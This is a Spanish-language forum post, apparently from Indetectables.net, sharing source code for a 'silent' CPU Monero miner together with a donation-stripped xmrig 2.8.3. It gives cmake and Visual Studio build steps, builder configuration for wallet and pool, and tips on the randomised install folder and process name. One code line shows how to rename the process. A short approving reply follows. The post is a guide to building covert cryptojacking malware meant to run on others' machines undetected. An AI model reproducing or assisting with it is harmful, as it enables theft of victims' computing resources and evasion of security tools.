Buenas a todos, dejo aqui el codigo fuente del minero silencioso CPU Indetectables Miner, también los proyectos modificados para "0" donación de xmrig-2.8.3 tanto para x86 como para x64.

Voy a tratar de explicar cuales son los pasos para realizar la compilación de xmrig, creo que es lo más complejo dada las dependencias que usa.

Primero debemos instalar [Enlace externo eliminado para invitados] , cmake y todas las dependencias....[Enlace externo eliminado para invitados]... Una vez instaladas todas las dependencias e instalado Vstudio, todo esto (lleva tiempo son algunos gigabyte's) Vamos a descargar [Enlace externo eliminado para invitados] "siempre la ultima version" Tambien necesitamos descargar el código fuente de [Enlace externo eliminado para invitados]"siempre la ultima version" (en ambos casos posteo los proyectos ya generados y modificados por mi)

[Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]

Recomiendo descomprimir xmrig-deps y xmrig-2.8.3 en una carpeta en la raiz de C:\ de esta manera vamos a evitar fallos a la hora de compilar. Una vez descomprimidos los archivos debemos generar los proyectos para x64 y x86 en mi caso ya los dejo generados. Si quieren generarlos ustedes mismos solo deben borrar las carpetas x86 y x64 que están en xmrig-2.8.3 que les deje y editar para posteriormente ejecutar los archivos bat "version x64.bat" y "versión x86.bat" con las rutas correctas, en mi caso para x86 seria asi...
mkdir buildx86
cd buildx86
cmake .. -G "Visual Studio 15 2017" -DXMRIG_DEPS=C:\xmrig-deps-3.3\msvc2017\x86
Si observan el código verán que yo descomprimi directamente en C:\ la carpeta xmrig-deps-3.3

Si todo va bien en las respectivas carpetas van a encontrar el archivo xmrig.sln. Abren estos con visual estudio y compilan en "release"

Mostrar/Ocultar

 X64

Mostrar/Ocultar

 X32


Ahora pasamos a CPU Indetectables Miner, descargamos el proyecto donde más nos guste, ejecutamos CPU Indetectables Miner.sln y compilamos en release.

Mostrar/Ocultar

[Enlace externo eliminado para invitados]
Cuando ejecutemos el builder tendremos que configurar el minero según sea nuestra wallet, Pool, Host, Puerto, etc

Ejemplo Para minergate sería así: la wallet es nuestro correo electrónico el resto de los datos los obtenemos de la página minergate pero seria algo como esto stratum+tcp://xmr.pool.minergate.com:45700 finalmente pide contraseña en este caso es x .

Mostrar/Ocultar

Cualquier duda preguntar.


NOTA.....cuando ejecutamos el minero genera un proceso y una carpeta de instalacion de nombre aleatorios. Esto lo podemos modificar fácilmente abriendo el archivo "\CPU Indetectables Miner\Properties\Resources.resx con algún bloc de notas.
Ejemplo para modificar el nombre del proceso buscamos esta linea de codigo y cambiamos lo sig.

original >  static string _ExePath = _InstallFolder + "%random1%.exe";
Modificado >  static string _ExePath = _InstallFolder + "blabla.exe";

Guardamos cambios y compilamos nuevamente el minero.

En la carpeta "CPU Indetectables Miner\Resources"  vamos a encontrar un ejecutable llamado "minerd.exe"  este archivo es xmrig.exe generado anteriormente solo que en este proyecto lleva otro nombre si por alguna razón  desean reemplazarlo tengan en cuenta mantener el nombre o bien cambiarlo en el proyecto.
Cualquier modificacion deberemos compilar nuevamente el CPU Indetectables Miner.
Espero que se entienda cualquier duda pregunten.

Las contraseñas para todos los archivos es "Indetectables.net"

Todos los creditos son para el autor original del código fuente "Artiist"
También agradezco a *Blau que en su momento me guió para poder compilar

Saludos.
Muy buen aporte bro. :drinking:
Seguro que con esto ya se dan por zanjado los cientos de posts sobre "Miners sin Donación". :ja:

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Responder

Volver a “Fuentes”